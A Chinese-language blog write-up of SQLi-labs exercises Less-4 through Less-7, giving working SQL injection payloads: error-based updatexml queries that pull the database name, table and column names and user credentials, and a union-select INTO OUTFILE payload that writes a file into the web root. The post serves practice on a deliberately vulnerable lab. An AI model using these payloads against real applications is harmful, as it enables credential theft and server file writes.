LESS--4

先试一下单引号,发现没有效果,不报错,然后根据题目用双引号,报错。

根据报错的内容可以发现,参数ID是包括在一对双引号和括号之中的。和上一题类似,构造注入查询语句。

") and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

接下来的步骤和之前一样。

LESS--5

知道数据库名是security之后,开始爆库。

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),1)--+

找到其中有一个users的表,一般就是我们需要找的表。然后查看表的字段名。

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1)--+

发现字段分别是id username password.。好了,有username和password我们就开始爆数据。

' and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),1)--+

第一个用户,用户名和密码都是Dumb。然后把limit后面的参数修改一下,就能查看其他用户的信息了,limit 0,1是第一个数据,limit 1,1是第二个数据,注意limit和substr不一样,limit是从0开始的,而substr是从1开始的。

LESS--6

和上一题不同的是这题是加双引号进行注入。其他都一样。

LESS--7

添加单引号,发现报错,猜测可能是字符型的注入。

首先添加单引号报错,再添加and 1=1 --+ 发现报错 认为不是单纯的单引号的类型,应该是还有其他的字符, 比如两个单引号,或者单引号括号, 或者单引号双引号, 单引号单引号括号之类的。

payload:?id=1')) union select 1,2,3 into outfile "C:\\wamp\\www\\sql\\Less-7\\test.txt"--+

测试是否写入:

发现确实存在,已经成功写入。

随机推荐

  1. P5934 [清华集训2012]最小生成树

    简要题意 给你一个 \(N\) 个点,\(M\) 条边的 无向连通 带权图.给定一条边 \((u,v,L)\),请问需要在原图中删除多少条边,使得将 \((u,v,L)\) 插入图后,它既可能在最小生 ...

  2. XCTF-web新手区

    前言 刷题平台:攻防世界 web简介 WEB是CTF竞赛的主要题型,题目涉及到许多常见的WEB漏洞,诸如XSS.文件包含.代码执行.上传漏洞.SQL注入.还有一些简单的关于网络基础知识的考察,例如返回 ...

  3. 方法引用_通过类名引用静态成员方法-方法引用_通过super引用父类的成员方法

    方法引用_通过类名引用静态成员方法 由于在java.lang .Nath类中已经存在了静态方法 abs,所以当我们需要通过Lambda来调用该方法时,有两种写法.首先是函数式接口∶ 第一种写法是使用L ...

  4. 字符输入流读取字符数据-writer类

    字符输入流读取字符数据 读取字符:read方法,每次可以读取一个字符的数据,提升为int类型,读取到文件末尾,返回-1,循环读取,代码使用演示∶ writer类 java.io.Filelwriter ...

  5. 行为型模式 - 访问者模式Visitor

    学习而来,代码是自己敲的.也有些自己的理解在里边,有问题希望大家指出. 行为型模式,我之所以把他放到第一个,是因为它号称是GoF中最难的一个. 模式的定义与特点 在访问者模式中(Visitor Pat ...

  6. nginx 隐藏 index.php 直接访问

    项目配置文件vhosts加上: if ( !-e $request_filename) { rewrite ^/(.*)$ /index.php/$1 last; break; } 修改后如图

  7. 【rust】rsut基础:模块的使用一、mod 关键字、mod.rs 文件的含义等

    本文内容 这篇文章是实战性质的,也就是说原理部分较少,属于经验总结,rust对于模块的例子太少了.rust特性比较多(悲),本文的内容可能只是一部分,实现方式也不一定是这一种. 关于 rust 模块的 ...

  8. Python实现随机森林RF并对比自变量的重要性

      本文介绍在Python环境中,实现随机森林(Random Forest,RF)回归与各自变量重要性分析与排序的过程.   其中,关于基于MATLAB实现同样过程的代码与实战,大家可以点击查看MAT ...

  9. 大三末java实习生一面凉经

    在南京投了一些小公司,想找个实习,因为知道自己很菜,就收到了一家公司的面试. 面试一般在线上进行,我是在腾讯会议上进行的.面试官其实挺好的,一般不会为难你,因为他知道你是在校生不会懂那么多企业的技术. ...

  10. JZOJ 4308.长寿花

    题面 思路 这种题当然要 \(dp\) 啦 设 \(g_{i,j}\) 表示前 \(i\) 个位置用指定的 \(j\) 种颜色装饰(即用颜色 \(1..j\) 来装饰) 那么 \(g_{i,j}=g_ ...